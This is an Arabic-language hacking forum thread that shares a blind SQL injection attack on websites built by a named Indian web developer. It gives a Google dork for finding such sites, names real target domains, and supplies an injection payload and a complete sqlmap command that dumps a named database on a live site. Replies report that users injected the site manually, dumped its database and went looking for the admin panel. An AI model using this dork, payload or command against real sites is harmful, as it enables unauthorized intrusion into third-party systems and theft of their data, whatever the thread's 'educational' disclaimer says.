ثغرة - Blind Sql Injection

[ExEExE is verified member.]

#Exploit Title: VSFB DEVELOPERS ZONE PVT - Blind Sql Injection​

• ضعه بقوقل أو أي محرك بحث:

#Google Dork: "Website Developed by VSFB DEVELOPERS ZONE PVT. LTD." قطه بقوقل  او اي محرك بحث

تجربة لبعض المواقع :​

Shri Aggarwal Sabha sirsa

Shri Aggarwal Sabha sirsa

shriaggarwalsabhasirsa.in

• احقن بعد رقم 2

%27%20and%20false--+

• افتح sqlmap حط هذا :

sqlmap -u https://samaritermuensingen.ch/index.php?id=2  --random-agent  --threads=10 --level=5 --risk=3   --no-cast --time-sec=10 -D samariter_1  --dump

تنبيه: هذا المحتوى للأغراض التعليمية فقط.

بالتوفيق​

 

[STORMSTORM is verified member.]

#Exploit Title: VSFB DEVELOPERS ZONE PVT - Blind Sql Injection

#Google Dork: "Website Developed by VSFB DEVELOPERS ZONE PVT. LTD." قطه بقوقل  او اي محرك بحث

تجربه لبعض المواقع :

Shri Aggarwal Sabha sirsa

Shri Aggarwal Sabha sirsa

shriaggarwalsabhasirsa.in

احقن بعد رقم 2

%27%20and%20false--+

مشاهدة المرفق 6372

افتح sqlmap حط هذا :

sqlmap -u https://samaritermuensingen.ch/index.php?id=2  --random-agent  --threads=10 --level=5 --risk=3   --no-cast --time-sec=10 -D samariter_1  --dump

بالتوفيق

تنبيه: هذا المحتوى للأغراض التعليمية فقط.

بارك الله فيك ياعقالي والله يعطيك الف عافيه
ننتظر جديدك دايماً
تقبل مروري

 

[Sub_Zero]

بارك الله فيك شكرا على ما قدمته

تم حقن الموقع بطريقة يدوية بعيدا عل اداة sqlmap
الموقع سهل وتم عمل Dump لقاعدة البيانات
Proof Of Concept

 

[yacindjo]

تم حقن الموقع يدويا

 

[KLD]

حد وصل لمسار لوحة الادمن